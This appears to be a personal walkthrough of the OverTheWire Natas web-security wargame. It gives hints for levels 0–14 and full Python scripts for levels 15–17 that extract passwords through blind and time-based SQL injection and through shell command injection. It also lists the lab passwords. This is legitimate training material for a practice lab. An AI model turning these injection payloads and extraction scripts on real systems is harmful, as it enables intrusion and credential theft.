natas_levels
Level 0
Password is in the comments.
Level 1
Open inspect element through keyboard shortcut and remove the oncontextmenu line from the body tag.
Level 2
When you view the source it shows a files/pixel.png
element present on the page. That implies that there is a file
folder in the server directory. Open the folder and see the file contents.
Level 3
Open robots.txt
and see the disallowed folder. This is checked by web crawlers to see what folders to not index.
Level 4
Change referer by setting up a proxy to localhost and then using mitmproxy.
Level 5
Change cookie by setting up localhost proxy and using mitmproxy.
Level 6
The PHP sauce has the file that has the secret word necessary for revealing the password.
Level 7
Check the HTML. It has a comment stating the page that has the password. Use that as a query in the URL to view the page.
Level 8
Check the PHP source they are providing. Get the string from the hexadecimal, reverse it, and do a base64
decode on it.
Level 9
Comment out the query and grep the file that has the password since the input goes unsantized to passthru.
Level 10
Do the same as before. Asterisk, period and forward slashes are not there in the filtered characters.
Level 11
base64
decode the data cookie. XOR it with the given cookie to get the XOR key. Once the key is received use it to change the cookie value to yes and encrypt it. Then send that as the cookie.
Level 12
Create a .php
file to cat the password. Change the html to send a php through the form instead of a jpg. Send it and open it in the browser.
Level 13
Add the JPEG magic bytes to the raw hexdump of the file. Then upload it.
Level 14
Comment out the sql query ahead of the username.
Level 15
#!/bin/python
import requests
url = "http://natas15.natas.labs.overthewire.org"
auth_username = "natas15"
auth_password = "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
iter = 1
test = True
while test:
test = False
for i in characters:
uri = url + "?debug=true"
r = requests.get(
uri,
auth=(auth_username, auth_password),
params={
"username": 'natas16" and SUBSTR(password, 1, '
+ str(iter)
+ ')="'
+ password
+ i
},
)
# print(r.text)
# print("Letter", i, r.elapsed.total_seconds())
if "exists" in r.text:
test = True
iter += 1
password += i
print("password:", password, flush=True)
print("password:", password)
Level 16
#!/usr/bin/python
import requests
import string
url = "http://natas16.natas.labs.overthewire.org"
auth_username = "natas16"
auth_password = "TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V"
characters = string.ascii_letters + string.digits
# print(characters)
default_needle = "Africans"
password_chars = ""
iter = 1
print("chars = ", end="")
for i in characters:
r = requests.get(
url,
auth=(auth_username, auth_password),
params={
"needle": default_needle + "$(grep " + i + " /etc/natas_webpass/natas17)"
},
)
# print(r.text)
if default_needle not in r.text:
password_chars += i
print(i, end="", flush=True)
print()
print("password chars = ", password_chars)
password = ""
while True:
for i in password_chars:
r = requests.get(
url,
auth=(auth_username, auth_password),
params={
"needle": default_needle
+ "$(grep ^"
+ password
+ i
+ " /etc/natas_webpass/natas17)"
},
)
if default_needle not in r.text:
password += i
print(password)
A post
method can also be used for this.
Level 17
#!/bin/python
import requests
url = "http://natas17.natas.labs.overthewire.org"
auth_username = "natas17"
auth_password = "XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd"
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
iter = 1
test = True
while test:
test = False
for i in characters:
uri = url + "?debug=true"
r = requests.get(
uri,
auth=(auth_username, auth_password),
params={
"username": "natas18\" and IF(SUBSTR(password, 1, "
+ str(iter)
+ ")=\""
+ password
+ i
+ "\", sleep(6), FALSE) and username = \"natas18"
},
)
# print(r.text)
print("Letter", i, r.elapsed.total_seconds())
if r.elapsed.total_seconds() > 6:
test = True
iter += 1
password += i
print("password:", password, flush=True)
print("password:", password)
Timing attack basically.
- natas 8: a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB
- natas 11: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg
- natas 12: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG
- natas 14: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP
- natas 16: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
- natas 18: 8nEduUXg8kFGPV84uLWvzKgn6oKjq6aq